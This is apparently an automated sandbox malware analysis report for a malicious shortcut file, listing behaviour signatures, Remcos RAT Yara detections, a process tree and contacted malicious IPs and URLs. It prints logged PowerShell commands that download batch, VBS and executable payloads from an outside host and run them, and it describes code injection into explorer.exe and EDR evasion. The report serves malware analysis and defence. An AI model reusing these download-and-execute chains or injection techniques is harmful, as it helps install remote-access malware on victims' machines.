Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 4924 base: 8F79C0 value: 55
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 4924 base: 400000 value: 00
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040D72E cpuid 16_2_0040D72E
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 16_2_00401F9D
Source: C:\Users\user\DZIPR.exe Code function: GetLocaleInfoA, 17_2_6FA64DBC
Source: C:\Users\user\DZIPR.exe Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW, 17_2_6FA489B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: GetLocaleInfoA, 18_2_6C534DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW, 18_2_6C5189B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: GetLocaleInfoA, 23_2_6FAE4DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW, 23_2_6FAC89B5
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z, 16_2_00401626
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 17_2_6FA5D72B
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA, 16_2_00404FAA
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1518489 Sample: Dlr7HYI6VL.lnk Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 104 Found malware configuration 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 Antivirus detection for dropped file 2->108 110 13 other signatures 2->110 13 cmd.exe 1 2->13         started        16 DZIPR.exe 1 2->16         started        18 DZIPR.exe 2->18         started        20 svchost.exe 1 1 2->20         started        process3 dnsIp4 152 Windows shortcut file (LNK) starts blacklisted processes 13->152 154 Wscript starts Powershell (via cmd or directly) 13->154 23 cmd.exe 3 2 13->23         started        25 powershell.exe 14 16 13->25         started        30 powershell.exe 16 13->30         started        36 2 other processes 13->36 156 Maps a DLL or memory area into another process 16->156 158 Found direct / indirect Syscall (likely to bypass EDR) 16->158 32 cmd.exe 2 16->32         started        34 cmd.exe 18->34         started        100 127.0.0.1 unknown unknown 20->100 signatures5 process6 dnsIp7 38 wscript.exe 1 23->38         started        41 conhost.exe 23->41         started        102 172.94.3.25, 49712, 49713, 49714 VOXILITYGB United States 25->102 86 C:\Users\user\AppData\Roaming\hello.bat, DOS 25->86 dropped 144 Powershell drops PE file 25->144 88 C:\Users\user\AppData\Roaming\hi.vbs, ASCII 30->88 dropped 90 C:\Users\user\AppData\Local\Temp\qapuwvr, PE32 32->90 dropped 146 Injects code into the Windows Explorer (explorer.exe) 32->146 148 Writes to foreign memory regions 32->148 150 Maps a DLL or memory area into another process 32->150 43 conhost.exe 32->43         started        45 explorer.exe 32->45         started        92 C:\Users\user\AppData\Local\Temp\gps, PE32 34->92 dropped 47 conhost.exe 34->47         started        49 explorer.exe 34->49         started        94 C:\Users\user\AppData\Roaming\ffo.bat, DOS 36->94 dropped file8 signatures9 process10 signatures11 124 Windows shortcut file (LNK) starts blacklisted processes 38->124 126 Wscript starts Powershell (via cmd or directly) 38->126 128 Windows Scripting host queries suspicious COM object (likely to drop second stage) 38->128 130 Suspicious execution chain found 38->130 51 cmd.exe 1 38->51         started        process12 signatures13 120 Windows shortcut file (LNK) starts blacklisted processes 51->120 122 Wscript starts Powershell (via cmd or directly) 51->122 54 AUGUST.exe 6 51->54         started        58 powershell.exe 16 51->58         started        60 conhost.exe 51->60         started        process14 file15 80 C:\Users\user\DZIPR.exe, PE32 54->80 dropped 82 C:\Users\user\DZIPR.dll, PE32 54->82 dropped 140 Drops PE files to the user root directory 54->140 62 DZIPR.exe 5 54->62         started        84 C:\Users\user\AppData\Roaming\AUGUST.exe, PE32 58->84 dropped signatures16 process17 file18 96 C:\Users\user\AppData\Roaming\...\DZIPR.exe, PE32 62->96 dropped 98 C:\Users\user\AppData\Roaming\...\DZIPR.dll, PE32 62->98 dropped 160 Switches to a custom stack to bypass stack traces 62->160 162 Found direct / indirect Syscall (likely to bypass EDR) 62->162 66 DZIPR.exe 1 62->66         started        signatures19 process20 signatures21 112 Windows shortcut file (LNK) starts blacklisted processes 66->112 114 Maps a DLL or memory area into another process 66->114 116 Switches to a custom stack to bypass stack traces 66->116 118 Found direct / indirect Syscall (likely to bypass EDR) 66->118 69 cmd.exe 5 66->69         started        process22 file23 78 C:\Users\user\AppData\Local\Temp\demhwk, PE32 69->78 dropped 132 Injects code into the Windows Explorer (explorer.exe) 69->132 134 Writes to foreign memory regions 69->134 136 Found hidden mapped module (file has been removed from disk) 69->136 138 2 other signatures 69->138 73 explorer.exe 69->73         started        76 conhost.exe 69->76         started        signatures24 process25 signatures26 142 Switches to a custom stack to bypass stack traces 73->142
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.94.3.25
 unknown United States
3223 VOXILITYGB true

Private

IP
127.0.0.1

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://172.94.3.25/hi.vbs true
  • Avira URL Cloud: safe
 unknown
http://172.94.3.25/AUGUST.exe true
  • Avira URL Cloud: safe
 unknown
http://172.94.3.25/ffo.bat true
  • Avira URL Cloud: safe
 unknown
fullimmersion777.com true
  • Avira URL Cloud: safe
 unknown
http://172.94.3.25/hello.bat true
